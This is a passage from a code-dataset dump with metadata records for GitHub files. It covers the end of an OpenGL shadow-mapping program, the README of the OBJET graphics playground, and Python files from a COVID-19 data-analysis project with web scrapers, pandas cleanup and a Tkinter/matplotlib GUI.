GL_DEPTH_COMPONENT, GL_FLOAT, NULL);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER);\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFBO);\n glFramebufferTexture2D(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_TEXTURE_2D, depthMap, 0);\n glDrawBuffer(GL_NONE); glReadBuffer(GL_NONE);\n glBindFramebuffer(GL_FRAMEBUFFER, 0);\n // shadow shader\n Shader* shadowShader = new Shader(shadowVertexShader, shadowFragmentShader);\n\n\n // render loop\n float time;\n float lastFrameTime = 0.0f;\n while (!glfwWindowShouldClose(window)) {\n\n processInput(window);\n\n shadowShader->use();\n model.setShadow(shadowShader);\n glViewport(0, 0, shadowWidth, shadowHeight);\n glBindFramebuffer(GL_FRAMEBUFFER, depthMapFBO);\n glClear(GL_DEPTH_BUFFER_BIT);\n model.draw(shadowShader);\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0);\n glViewport(0, 0, width, height);\n glClearColor(0.55f, 0.77, 0.85f, 1.0f);\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);\n\n // change color\n time = glfwGetTime();\n deltaTime = time - lastFrameTime;\n lastFrameTime = time;\n\n // render objects with objectShader\n objectShader->use();\n objectShader->setUniform(\"projection\", projection);\n objectShader->setUniform(\"cameraPosition\", cameraPos);\n model.setEnvironment(objectShader);\n objectShader->setUniform(\"shadowMap\", 0);\n\n glActiveTexture(GL_TEXTURE0);\n glBindTexture(GL_TEXTURE_2D, depthMap);\n \n // overried camera settings\n view = glm::lookAt(cameraPos, cameraPos + cameraFront, cameraUp);\n objectShader->setUniform(\"view\", view);\n // draw\n model.draw(objectShader);\n\n glfwSwapBuffers(window);\n glfwPollEvents();\n }\n\n glfwTerminate();\n return 0;\n}\n" }, { "alpha_fraction": 0.6948022842407227, "alphanum_fraction": 0.7130164504051208, "avg_line_length": 31.60869598388672, "blob_id": "29bbcc546fd46e1e3b849d68727acfa550c89bf7", "content_id": "8afacc7e60f9424d1392955eeda5825f337ca813", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2253, "license_type": "permissive", "max_line_length": 211, "num_lines": 69, "path": "/README.md", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "\n# OBJET: A Graphics Playground for Computer Vision\nOBJET, is a graphical environment, developed in OpenGL and accessible in Python, to cater to the data needs of one willing to conduct research on computer vision in such domains. \n\n<img align=\"right\" width=\"200\" height=\"200\" src=\"./resources/logo/OBJET.png\">\nLoad your own objects in a room, take a snapshot of the viewport, from the viewpoint of the customizable camera, and load it to python. \nThis gives you the ability to create data on-the-fly, in your python data loader. \nCheck out the footnoted video by Ali Eslami et al. to see such environment in practice.\n\n## Synopsis\n\n### Dependencies\nOn Arch Linux:\n```\nsudo pacman -S rapidjson mesa glfw-x11 glew glm assimp swig freeimage\n```\n\n### Usage\n\n#### Walk Around\n```sh \nmake \n./main\n```\n\n#### Build and Install for Python\n```sh \nmake python -j4\npip install .\n```\n\n#### get_image\n<img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/ps_meta.png\" title=\"ps_meta room\"> <img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/meta.png\" title=\"meta room\">\n```python\n# for now\nfrom pyobjet import Objet\nobjet = Objet(\"./configs/ps_meta.json\")\nobjet.set_object_position(\"cross\", [3., 0., 3.])\nobjet.draw()\nimage = objet.get_image()\nobjet.to_image(\"./output.png\")\n```\n\n#### get_depth_map\n<img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/depth_ps_meta.png\" title=\"ps_meta room\"> <img align=\"right\" width=\"150\" height=\"150\" src=\"./resources/images/depth_meta.png\" title=\"meta room\">\n```python\n# for now\ndepth_map = objet.get_depth_map()\n# for demonstration\nfrom PIL import Image\nimg = Image.fromarray(depth_map * 10)\nimg.show()\n```\n\n\n\n##### What does \"OBJET\" mean?\nObjet is French for \"object.\"\n\n##### Are you French?\nNo, I used Google Translate.\n\n##### Why C++/SWIG and not PyOpenGL?\n* PyOpenGL is an overkill by nature. \n* Might be interested in using this library in other languages.\n* Might be interested in linking the data directly to CUDA later on.\n* Data Scientists should learn to install dependencies on their own — life ain't always `pip install package`.\n* This work has been done over a COVID-19 quarantine, I had to kill some time.\n\n###### Ali Eslami et al.: www.youtube.com/watch?v=G-kWNQJ4idw\n" } ]
23
AnshBhatti/COVID-19_Data_Analysis
https://github.com/AnshBhatti/COVID-19_Data_Analysis
ca7cfe2a886545d822dbb5f79b44305d6409d316
734d843a985baa958a0897b321be7f76a2924d9c
dbc0a671bde2c28a5a3457a8a786b1752a56d1bc
refs/heads/master
2022-11-28T01:50:40.483803
2020-08-05T21:06:40
2020-08-05T21:06:40
259,742,263
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6622222065925598, "alphanum_fraction": 0.6733333468437195, "avg_line_length": 32.61538314819336, "blob_id": "74a7439e027c0b5f102c78bb76de30638029c488", "content_id": "3228f9392020a2bea4e6c6887a894b4f4be52d29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 450, "license_type": "no_license", "max_line_length": 78, "num_lines": 13, "path": "/life_exp.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nimport pandas as pd\r\ndef get_exp():\r\n browser=webdriver.Chrome(\"chromedriver.exe\")\r\n browser.implicitly_wait(10)\r\n browser.get(\"https://www.worldometers.info/demographics/life-expectancy/\")\r\n df=pd.read_html(browser.page_source)[0]\r\n del df[\"#\"]\r\n del df[\"Females Life Expectancy\"]\r\n del df[\"Males Life Expectancy\"]\r\n df.drop(29)\r\n df.to_csv(\"life_exp.csv\",index=False)\r\n browser.quit()\r\n" }, { "alpha_fraction": 0.797764241695404, "alphanum_fraction": 0.8028455376625061, "avg_line_length": 41.78260803222656, "blob_id": "38b7a942fc63937c206c706c339f6b1716fcedff", "content_id": "cb4c756a1bfd6a088bbffcd3af451e9b8075ffeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 984, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/DESCRIPTION.txt", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "PROGRAM: main.py\n\nCREATOR: Ansh Bhatti\n\nPURPOSE: In this time of heightened global crisis, everybody wants to know \nwhat exactly is happening. This data analysis serves purposes of:\n- Providing up-to-date statistics regarding COVID-19 throughout the world\n- Generating visualizations of the statistics of [at most 5 at a given \ntime] countries\n- Providing the \"Response Factor,\" which is essentially the number of\ndays it took for a country to reach its maximum number of active cases.\nAs of now, the Response Factor will not be accurate as many countries are\nyet to reach their maximum.\n- Finding the relationship between the Global Health Security Index and \nthe Response Factor in a scatter plot\n- Finding the relationship between Life Expectancy and\nthe Response Factor in a scatter plot\n\nCREDITS:\n- Johns Hopkins Whiting School of Engineering for their\nCOVID-19 dataset on Github\n- Worldometers for their life expectancy chart\n- GHS Index for their Global Health Security Index chart\n" }, { "alpha_fraction": 0.5311750769615173, "alphanum_fraction": 0.5311750769615173, "avg_line_length": 22.828571319580078, "blob_id": "ce0421057a9bac8d5aed8c59be52f875f9b3c1ad", "content_id": "c3895281a7a90041c19fce01d30955f10e6df631", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 834, "license_type": "no_license", "max_line_length": 69, "num_lines": 35, "path": "/setup_data.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "def setup_data(data):\n #print(data.head())\n data[\"Active\"]=data[\"Confirmed\"]-data[\"Recovered\"]-data[\"Deaths\"]\n try:\n del data[\"Province/State\"]\n except KeyError:\n del data[\"Province_State\"]\n try:\n del data[\"Last_Update\"]\n except KeyError:\n try:\n del data[\"Last Update\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"Long_\"]\n del data[\"Lat\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"FIPS\"]\n except KeyError:\n s=\"l\"\n try:\n del data[\"Combined_Key\"]\n except KeyError:\n s=\"l\"\n #del data[\"Confirmed\"]\n #del data[\"Deaths\"]\n #del data[\"Recovered\"]\n try:\n data=data.groupby(\"Country_Region\").sum()\n except KeyError:\n data=data.groupby(\"Country/Region\").sum()\n return data\n" }, { "alpha_fraction": 0.7604290843009949, "alphanum_fraction": 0.781883180141449, "avg_line_length": 28.964284896850586, "blob_id": "f070eaffb4a9a4ac92ed3b4f9c9ff7ad15cdd794", "content_id": "3e9fe92dd5aeca4e9e60556450b4176b302ef6d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 839, "license_type": "no_license", "max_line_length": 151, "num_lines": 28, "path": "/README.md", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "# COVID-19_Data_Analysis\nGet updates, analyze countries' data, analyze their response relative to their recovery time, analyze Global Security Health Index and life expectancy.\n\nInstructions:\n1) Execute main.py (do not manipulate any of the files)\n2) Wait for data updates (if needed)\n3) In the GUI that opens, click on 1 of the 4 boxes for its respective functionality\n\nCurrent updates:\n- Project is done! I open myself to feedback and revisions. \n\nPackages used:\n- Openpyxl\n- Pandas\n- Matplotlib\n- Numpy\n- Lxml\n- Tkinter\n- Datetime and time\n\nLanguage: Python 3\n\nCredits:\n- Johns Hopkins Whiting School of Engineering for their COVID-19 dataset on Github\n- Worldometers for their life expectancy chart\n- GHS Index for their Global Health Security Index chart\n\nAnalysis: https://medium.com/@anshvbhatti/covid-19-analysis-lets-rewind-f1613afebe97\n" }, { "alpha_fraction": 0.6617100238800049, "alphanum_fraction": 0.6765799522399902, "avg_line_length": 38.349998474121094, "blob_id": "fde02f8fcce61bed9f033ca596c6535f5d348613", "content_id": "fc1c90436f81d159baf5f922f566a0b87c103438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 807, "license_type": "no_license", "max_line_length": 82, "num_lines": 20, "path": "/ghs.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "from selenium import webdriver\r\nimport pandas as pd\r\ndef acquire_ghs():\r\n browser=webdriver.Chrome(\"chromedriver.exe\")\r\n browser.implicitly_wait(10)\r\n browser.get(\"https://www.ghsindex.org/\")\r\n table=browser.find_element_by_class_name(\"countryTable\")\r\n btn=browser.find_element_by_xpath(\"//button[@class='seeCompleteList button']\")\r\n btn.click()\r\n content=pd.read_html(browser.page_source)[0]\r\n content=content[[content.columns[1],content.columns[2]]]\r\n countries=content[\"Country\"]\r\n scores=content[content.columns[1]]\r\n for a in range(len(countries)):\r\n countries[a]=countries[a][9:]\r\n scores[a]=float(scores[a][13:17])\r\n content[\"Country\"]=countries\r\n content[content.columns[1]]=scores\r\n content.to_csv(\"ghs.csv\",index=False)\r\n browser.quit()\r\n" }, { "alpha_fraction": 0.6338376998901367, "alphanum_fraction": 0.6774621605873108, "avg_line_length": 51.440834045410156, "blob_id": "07a804d80339b08cd23da8858981435ac12141bb", "content_id": "27568b557d9db5709a996ecc5a9ed32899526e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22609, "license_type": "no_license", "max_line_length": 847, "num_lines": 431, "path": "/main.py", "repo_name": "AnshBhatti/COVID-19_Data_Analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom tkinter import *\nfrom datetime import date, timedelta, datetime\nimport os.path\nfrom generate_excel import generate, update\nfrom ghs import acquire_ghs\nfrom time import sleep\nimport matplotlib.pyplot as plt\nimport tkinter.font as tkFont\nfrom PIL import ImageTk,Image\nfrom time import sleep\nfrom life_exp import get_exp\nglobal letters\nglobal lis\nglobal opts\nglobal colors\nglobal m\nglobal b\ncolors=[\"red\",\"green\",\"blue\",\"brown\",\"yellow\"]\nletters=[\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S1\",\"S2\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\nlis=[-1,-1,-1,-1,-1]\ntk=Tk()\nhelv36 = tkFont.Font(family=\"Comfortaa\",size=14)\ntk.title(\"COVID-19 Analysis\")\ncanvas=Canvas(bg=\"#fce8b1\",width=1000,height=750)\ncanvas.pack()\ndef call(event):\n print(str(event.x)+' '+str(event.y))\ncanvas.bind(\"<Button-1>\",call)\n\nBASE_URL=\"https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/\"\ndef updates_by_country(event,r=1):\n canvas.delete('all')\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(930,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Covid-19 Cases and Response Factors\",justify=CENTER)\n writ=canvas.create_rectangle(50,100,150,140,fill=\"#dbddff\",outline=\"#dbddff\")\n writ1=canvas.create_text(100,120,text=\"Written\",font=helv36)\n grph=canvas.create_rectangle(150,100,250,140,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n grph1=canvas.create_text(200,120,text=\"Graph\",font=helv36)\n canvas.tag_bind(writ,\"<Button-1>\",wri)\n canvas.tag_bind(writ1,\"<Button-1>\",wri)\n canvas.tag_bind(grph,\"<Button-1>\",gr)\n canvas.tag_bind(grph1,\"<Button-1>\",gr)\n if r==1:\n written('A')\n else:\n graph()\ndef wri(event):\n updates_by_country(event,r=1)\ndef written(let):\n canvas.create_rectangle(50,140,950,710,fill=\"#dbddff\",outline=\"#dbddff\")\n canvas.create_text(70,160,text=\"Country\",font=\"Times 14\",anchor=W)\n canvas.create_text(200,160,text=\"Confirmed\",font=\"Times 14\",anchor=W)\n canvas.create_text(300,160,text=\"Recovered\",font=\"Times 14\",anchor=W)\n canvas.create_text(400,160,text=\"Deaths\",font=\"Times 14\",anchor=W)\n canvas.create_text(500,160,text=\"Active\",font=\"Times 14\",anchor=W)\n canvas.create_text(600,160,text=\"Response Factor\",font=\"Times 14\",anchor=W)\n canvas.create_text(860,180,text=\"Browse countries by letter:\",font=\"Times 14\",width=150)\n act=active.tail(1)\n con=confirmed.tail(1)\n dea=deaths.tail(1)\n rec=recovered.tail(1)\n y=190\n for a in range(len(countries)):\n if countries[a][0].upper()==let or let==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or let==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n canvas.create_text(70,y,text=countries[a],font=\"Times 12\",anchor=W,width=130)\n canvas.create_text(200,y,text=int(con[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(300,y,text=int(rec[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(400,y,text=int(dea[countries[a]]),font=\"Times 12\",anchor=W)\n canvas.create_text(500,y,text=int(act[countries[a]]),font=\"Times 12\",anchor=W)\n if countries[a] in list(country_rf.index):\n canvas.create_text(600,y,text=country_rf[\"rf\"][countries[a]],font=\"Times 12\",anchor=W)\n else:\n canvas.create_text(600,y,text=\"N/A\",font=\"Times 12\",anchor=W)\n y+=30\n var=StringVar(tk)\n var.set(let)\n w=OptionMenu(tk,var,*letters,command=written)\n canvas.create_window(900,200,window=w)\ndef gr(event):\n updates_by_country(0,r=0)\ndef graph():\n canvas.create_rectangle(50,140,950,710,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(500,160,text=\"Select at most 5 countries you want to compare (leave dropdowns empty as needed):\",font=\"Times 14\")\n q=StringVar(tk)\n q1=StringVar(tk)\n q2=StringVar(tk)\n q3=StringVar(tk)\n q4=StringVar(tk)\n q.set(\"Select a letter:\")\n q1.set(\"Select a letter:\")\n q2.set(\"Select a letter:\")\n q3.set(\"Select a letter:\")\n q4.set(\"Select a letter:\")\n p1=OptionMenu(tk,q,*letters,command=p11)\n p2=OptionMenu(tk,q1,*letters,command=p22)\n p3=OptionMenu(tk,q2,*letters,command=p33)\n p4=OptionMenu(tk,q3,*letters,command=p44)\n p5=OptionMenu(tk,q4,*letters,command=p55)\n canvas.create_window(140,195,window=p1)\n canvas.create_window(320,195,window=p2)\n canvas.create_window(500,195,window=p3)\n canvas.create_window(680,195,window=p4)\n canvas.create_window(860,195,window=p5)\n global v\n global v1\n global v2\n global v3\n global v4\n v=StringVar(tk)\n v1=StringVar(tk)\n v2=StringVar(tk)\n v3=StringVar(tk)\n v4=StringVar(tk)\n v.set(\"Select a country:\")\n v1.set(\"Select a country:\")\n v2.set(\"Select a country:\")\n v3.set(\"Select a country:\")\n v4.set(\"Select a country:\")\ndef p11(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o1=OptionMenu(tk,v,*cont,command=add)\n canvas.create_window(140,240,window=o1)\ndef p22(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o2=OptionMenu(tk,v1,*cont,command=add)\n canvas.create_window(320,240,window=o2)\ndef p33(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o3=OptionMenu(tk,v2,*cont,command=add)\n canvas.create_window(500,240,window=o3)\ndef p44(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o4=OptionMenu(tk,v3,*cont,command=add)\n canvas.create_window(680,240,window=o4)\ndef p55(val):\n cont=[]\n for a in range(len(countries)):\n if countries[a][0].upper()==val or val==\"S1\" and countries[a][0].upper()=='S' and countries[a][1].lower()<'o' or val==\"S2\" and countries[a][0].upper()=='S' and countries[a][1].lower()>='o':\n cont.append(countries[a])\n o5=OptionMenu(tk,v4,*cont,command=add)\n canvas.create_window(860,240,window=o5)\ndef add(val):\n global li\n l1=[v.get(),v1.get(),v2.get(),v3.get(),v4.get()]\n li=[]\n for each in l1:\n if each!=\"Select a country:\":\n li.append(each)\n if len(li)==1:\n canvas.create_text(70,320,width=200,anchor=W,justify=LEFT,text=\"Click on any of the following after you select at most 5 countries:\",font=\"Times 14\")\n bt1=Button(text=\"Confirmed\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=confirm)\n bt2=Button(text=\"Active\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=activ)\n bt3=Button(text=\"Recovered\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=recover)\n bt4=Button(text=\"Deaths\",width=10,relief=FLAT,font=\"Times 14\",bg=\"#31007a\",fg=\"white\",command=show_death)\n canvas.create_window(150,400,window=bt1)\n canvas.create_window(150,470,window=bt2)\n canvas.create_window(150,540,window=bt3)\n canvas.create_window(150,610,window=bt4)\n print(li)\ndef confirm():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Confirmed cases\")\n va=max(list(confirmed.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(confirmed[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef put_img(fil,x,y):\n img=PhotoImage(file=fil)\n label=Label(image=img)\n label.image=img\n label.pack()\n canvas.create_window(x,y,window=label)\ndef activ():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Active cases\")\n va=max(list(active.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(active[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef recover():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"# of people recovered\")\n va=max(list(recovered.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(recovered[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef show_death():\n z=plt.cla()\n z=plt.xlabel(\"Date\")\n z=plt.ylabel(\"Confirmed cases\")\n va=max(list(deaths.index))+1\n #z=plt.yticks(np.arange(0,6000000,50000))\n z=plt.xticks(np.arange(0,va,int(va/4)))\n confi=[list(deaths[each]) for each in li]\n dates=active[\"Date\"]\n for e in range(len(li)):\n z=plt.plot(dates,confi[e],color=colors[e],label=li[e])\n plt.legend()\n plt.savefig('plot.png',bbox_inches='tight')\n put_img('plot.png',620,485)\ndef rf_by_country(event):\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(950,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Covid-19 Response Factor v. Confirmed Cases\")\n canvas.create_rectangle(50,140,950,710,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n con=confirmed.tail(1)\n z=plt.cla()\n z=plt.xlabel(\"# of confirmed cases to date\")\n z=plt.ylabel(\"Response factor\")\n x_data=np.array([int(con[each]) for each in countries])\n y_data=np.array(list(country_rf[\"rf\"]))\n m,b=np.polyfit(x_data,y_data,1)\n print(y_data)\n z=plt.title(\"Response Factor vs. Cases\")\n plt.scatter(x_data,y_data,color=\"black\")\n plt.plot(x_data,m*x_data+b,color=\"black\")\n plt.savefig(\"plot1.png\",bbox_inches='tight')\n put_img('plot1.png',650,380)\n canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''Analyzing the dependance of the Response Factor of each country over its current # of confirmed cases is important in order to understand how much the # of confirmed cases affected the time it will take for a country to reach its peak in the number of active cases. This relationship is all but obvious. Even though in general, there is a positive correlation as expected, there are a lot of outliers, i.e. a lot of countries that either have a huge response factor and low number of confirmed cases or a low response factor and a high number of confirmed cases. As of now, issues with this analysis include the fact that the number of active cases in some countries are still increasing, so the response factor of many countries is''')\n canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''still increasing. Another issue is squeezed visualization of countries' # of confirmed cases in the scatter plot due to outliers in the # of confirmed cases. The correlation value tells us that, in general, for a +1 increase in response factor, nearly '''+str(int(1/m))+''' additional cases are needed.''')\ndef rf_ghs(event):\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(950,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Response Factor v. Global Health Security Index\")\n canvas.create_rectangle(50,140,950,720,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n x_data=[]\n y_data=[]\n for each in list(ghs.index):\n if each in countries:\n x_data.append(ghs[ghs.columns[0]][each])\n y_data.append(country_rf[\"rf\"][each])\n x_data=np.array(x_data)\n y_data=np.array(y_data)\n plt.cla()\n plt.xlabel(\"Global Health Security Index\")\n plt.ylabel(\"Response Factor\")\n plt.title(\"Response Factor v. GHS Index\")\n m,b=np.polyfit(x_data,y_data,1)\n plt.scatter(x_data,y_data,color=\"black\")\n plt.plot(x_data,m*x_data+b,color=\"black\")\n plt.savefig(\"plot2.png\",bbox_inches='tight')\n put_img(\"plot2.png\",650,380)\n canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''Many consider Global Health Security Index to be an important factor that determined the fate of a country infected with the coronavirus. It is a score of how prepared a country is to face a pandemic such as the coronavirus. For this reason, it is important to compare GHS index with what we define as response factor, which is the number of days it took for a country to reach its peak in the number of active cases. Thus, one would expect a negative correlation between response factor and the GHS index, as they would expect a better (lower) response factor with a better (higher) GHS index. However, the scatter plot and linear regression indicate a slightly positive correlation, showing that an increase in the GHS''')\n canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''index will result in an increase in the response factor. The low magnitude of correlation also indicates that response factor and the GHS index are largely unrelated to each other. Both developed and developing countries suffered different fates, which mostly did not depend on how developed they were as indicated by this correlation. Many developed countries rank near the top in the number of cases due to other factors such as tourism and mass transportation. Thus, the GHS index is a good measure of preparedness, but not the reality.''')\n #plt.show()\ndef acr_rf(event):\n canvas.create_rectangle(20,20,980,730,fill=\"white\",outline=\"white\")\n btn=Button(text='Return',command=setup_GUI,relief=FLAT,bg=\"cyan\")\n canvas.create_window(950,120,window=btn)\n canvas.create_text(500,50,font=\"Courier 20\",text=\"Response Factor v. Life Expectancy\")\n canvas.create_rectangle(50,140,950,720,fill=\"#ffe3cf\",outline=\"#ffe3cf\")\n canvas.create_text(60,160,text=\"Analysis:\",font=\"Times 20\",anchor=W,justify=LEFT)\n x_data=[]\n y_data=[]\n for each in countries:\n if each in list(life.index):\n x_data.append(life[life.columns[0]][each])\n y_data.append(country_rf[\"rf\"][each])\n x_data=np.array(x_data)\n y_data=np.array(y_data)\n m,b=np.polyfit(x_data,y_data,1)\n plt.cla()\n plt.ylabel(\"Response Factor\")\n plt.xlabel(\"Life Expectancy (in years)\")\n plt.title(\"Response Factor v. Life Expectancy\")\n plt.scatter(x_data,y_data,color=\"black\")\n plt.plot(x_data,m*x_data+b,color=\"black\")\n plt.savefig(\"plot3.png\",bbox_inches=\"tight\")\n put_img(\"plot3.png\",650,380)\n canvas.create_text(60,190,width=300,justify=LEFT,anchor=NW,font=\"Times 14\",text='''The life expectancy of a country is an average number of years that a person is expected to live for in that country. Higher life expectancy is generally associated with nations more on the developed side due to better health infrastructures and promotion of well-being in those countries. For this reason it is essential to analyze whether life expectancy has any impact the response factor of a country (the number of days it took for a country to reach its peak in active cases). Many would assume a negative correlation, in which a better life expectancy (higher) will resulted in a better response factor (lower). It turns out that the correlation is indeed negative. However, the magnitude of the correlation is low enough for the deduction that life''')\n canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''expectancy and response factor are barely or not correlated. The regression plot indicates that a significant difference in life expectancy will lead to a minor change. Therefore, the myth that life expectancy means better conditions for a country that faces a pandemic is not necessarily true as it depends on case to case. A pandemic's effects and every country's response factor vary on many different factors, including tourism, mass transportation, government action, public action, and political/social situation.''')\ndef setup_GUI():\n canvas.delete('all')\n canvas.create_text(500,50,text=\"COVID-19 Data Analysis\",font=\"Courier 25\")\n canvas.create_text(500,100,text=\"By: Ansh Bhatti\",font=\"Courier 16\")\n c1=canvas.create_rectangle(100,150,450,400,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c2=canvas.create_rectangle(550,150,900,400,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c3=canvas.create_rectangle(100,450,450,700,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c4=canvas.create_rectangle(550,450,900,700,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c11=canvas.create_text(275,270,text=\"COVID-19 Updates and Response\\n Factor by Country\",justify=CENTER,font=\"Times 16\")\n c22=canvas.create_text(725,270,text=\"Response Factor vs Cases\",font=\"Times 16\")\n c33=canvas.create_text(275,570,text=\"Response Factor v. Global Health\\nSecurity Index\",justify=CENTER,font=\"Times 16\")\n c44=canvas.create_text(725,570,text=\"Response Factor v. Life Expectancy\",font=\"Times 16\",justify=CENTER)\n canvas.tag_bind(c1,\"<Button-1>\",updates_by_country)\n canvas.tag_bind(c11,\"<Button-1>\",updates_by_country)\n canvas.tag_bind(c2,\"<Button-1>\",rf_by_country)\n canvas.tag_bind(c22,\"<Button-1>\",rf_by_country)\n canvas.tag_bind(c3,\"<Button-1>\",rf_ghs)\n canvas.tag_bind(c33,\"<Button-1>\",rf_ghs)\n canvas.tag_bind(c4,\"<Button-1>\",acr_rf)\n canvas.tag_bind(c44,\"<Button-1>\",acr_rf)\nif os.path.exists(\"data.xlsx\"):\n f=open(\"STATUS.txt\",'r')\n r=f.readline().split()\n f.close()\n d=str(datetime.today()).split()[0]\n if d[5:8]+d[8:]+'-'+d[:4]!=r[0]:\n print(\"Please wait for 